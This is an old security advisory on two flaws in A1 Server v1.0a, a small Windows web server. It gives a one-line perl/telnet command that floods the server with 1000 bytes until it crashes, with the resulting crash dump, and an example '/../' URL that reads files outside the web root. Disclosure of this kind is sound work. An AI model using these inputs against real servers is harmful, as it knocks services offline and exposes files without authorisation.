A1 Server v1.0a HTTPd (DoS & Dir Traversal)

[slipy () B10Z NET]

Introduction:

A1 Server v1.0a is a HTTPd server for the Windows 
OS, and it will deliver the following content: GIF 
impages, HTM or HTML pages, EXE files, and ZIP 
files. The server is very small, but yet somewhat 
stable and is freeware! (Yeah. right)


The Vendors website is:
http://msnhomepages.talkcity.com/windowsway/lriver
2/a1server.htm


Problem #1 : Denial of Service Attack

A1 Server v1.0a is vulnerable to a nasty Denial of 
Service attack where it can be flooded with useless 
junk until the server crashes promptly. Once it has 
been crashed it needs to be restarted again for it to 
work properly. All windows versions apear to be 
affected. 

Example:

echo `perl -e 'print "A" x 1000'` | telnet a1server 80 

^^ = Will cause the program to quit within seconds 
and display:

A1SERVER caused an invalid page fault in module 
A1SERVER.EXE at 016f:004101ae. 
Registers:
EAX=00000000 CS=016f EIP=004101ae 
EFLGS=00010246 EBX=00420094 SS=0177 
ESP=006bfc70 EBP=006bfc78 ECX=ffffffff DS=0177 
ESI=00000001 FS=6417 EDX=004263b2 ES=0177 
EDI=00000001 GS=5e47 Bytes at CS:EIP:
f2 ae f7 d1 8b 7d 08 8b c7 8b d1 d1 e9 d1 e9 fc 
Stack dump:
004211a8 0000001c 006bfca8 004151db 004211a8 
00000001 006bfcb0 00008d20 006bfcfc bff7b796 
bffc9490 00000177 006bfcb8 bff7b828 006bfcc8 
bff7363b 

Problem #2 : Directory Traversal

Adding the string "/../" to an URL allows an attacker to 
view any file on the server provided you know where 
the file is at in the first place. 

Example:

http://www.a1server.win/../../../../../../Scandisk.log 

^^ = Will obviously open the Scandisk.log fiel.


Vendor has been notified. No e-mail reply yet.

--------------------
b10z HTTPd Advisory
slipy () b10z net

Found: February 26th, 2001.